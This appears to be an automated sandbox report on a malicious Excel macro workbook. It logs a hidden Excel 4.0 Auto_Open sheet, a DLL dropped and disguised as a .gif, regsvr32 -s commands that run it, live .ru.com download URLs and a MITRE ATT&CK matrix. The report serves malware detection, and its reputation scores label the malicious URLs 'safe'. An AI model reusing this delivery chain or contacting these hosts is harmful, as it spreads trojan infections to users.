    Source: documents-1819557117.xlsmInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: documents-1819557117.xlsmInitial sample: Sheet size: 24417
    Office process drops PE fileShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif 0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524
    Source: Joe Sandbox ViewDropped File: C:\Users\user\ghnrope2.dll 0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524
    Source: workbook.xmlBinary string: " sheetId="6" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/><sheet name="Doc3" sheetId="5" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$AO$28</definedName></definedNames><calcPr calcId="122211"/></workbook>
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLSM@11/14@5/4
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C20F957A-8CD7-42EE-8B0B-242FAAEC719B} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: documents-1819557117.xlsmReversingLabs: Detection: 10%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\ghnrope
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\ghnropeJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: documents-1819557117.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: documents-1819557117.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: documents-1819557117.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: documents-1819557117.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: documents-1819557117.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: documents-1819557117.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: documents-1819557117.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: documents-1819557117.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: regsvr32.exe, 00000004.00000002.243420621.0000000000800000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000004.00000002.243420621.0000000000800000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000004.00000002.243420621.0000000000800000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000004.00000002.243420621.0000000000800000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21DLL Side-Loading1Process Injection1Masquerading121OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol14Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer3SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    documents-1819557117.xlsm11%ReversingLabs

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif12%ReversingLabsWin64.Trojan.Wacatac
    C:\Users\user\ghnrope2.dll12%ReversingLabsWin64.Trojan.Wacatac

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    http://runolfsson-jayde07s.ru.com/ind.html0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    http://cremin-ian07u.ru.com/ind.html0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    runolfsson-jayde07s.ru.com
    8.211.4.209
    truefalse
      unknown
      cremin-ian07u.ru.com
      8.211.4.209
      truefalse
        unknown
        api.globalsign.cloud
        104.18.25.243
        truefalse
          unknown
          cesiroinsurance.com
          67.222.38.97
          truefalse
            unknown
            shalombaptistchapel.com
            162.251.80.27
            truefalse
              unknown
              innermetransformation.com
              173.201.252.173
              truefalse
                unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://runolfsson-jayde07s.ru.com/ind.htmlfalse
                • Avira URL Cloud: safe
                unknown
                http://cremin-ian07u.ru.com/ind.htmlfalse
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.diagnosticssdf.office.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                  high
                  https://login.microsoftonline.com/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                    high
                    https://shell.suite.office.com:14437F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                      high
                      https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                        high
                        https://autodiscover-s.outlook.com/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                          high
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                            high
                            https://cdn.entity.7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://api.addins.omex.office.net/appinfo/query7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                              high
                              https://clients.config.office.net/user/v1.0/tenantassociationkey7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                high
                                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                  high
                                  https://powerlift.acompli.net7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://rpsticket.partnerservices.getmicrosoftkey.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://lookup.onenote.com/lookup/geolocation/v17F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                    high
                                    https://cortana.ai7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                      high
                                      https://cloudfiles.onenote.com/upload.aspx7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                        high
                                        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                          high
                                          https://entitlement.diagnosticssdf.office.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                            high
                                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                              high
                                              https://api.aadrm.com/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://ofcrecsvcapi-int.azurewebsites.net/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                high
                                                https://api.microsoftstream.com/api/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                  high
                                                  https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                    high
                                                    https://cr.office.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                      high
                                                      https://portal.office.com/account/?ref=ClientMeControl7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                        high
                                                        https://ecs.office.com/config/v2/Office7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                          high
                                                          https://graph.ppe.windows.net7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                            high
                                                            https://res.getmicrosoftkey.com/api/redemptionevents7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://powerlift-frontdesk.acompli.net7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://tasks.office.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                              high
                                                              https://officeci.azurewebsites.net/api/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                high
                                                                https://store.office.cn/addinstemplate7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                  high
                                                                  https://globaldisco.crm.dynamics.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                    high
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                      high
                                                                      https://store.officeppe.com/addinstemplate7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://dev0-api.acompli.net/autodetect7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.odwebp.svc.ms7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://api.powerbi.com/v1.0/myorg/groups7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                        high
                                                                        https://web.microsoftstream.com/video/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                          high
                                                                          https://graph.windows.net7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                            high
                                                                            https://dataservice.o365filtering.com/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
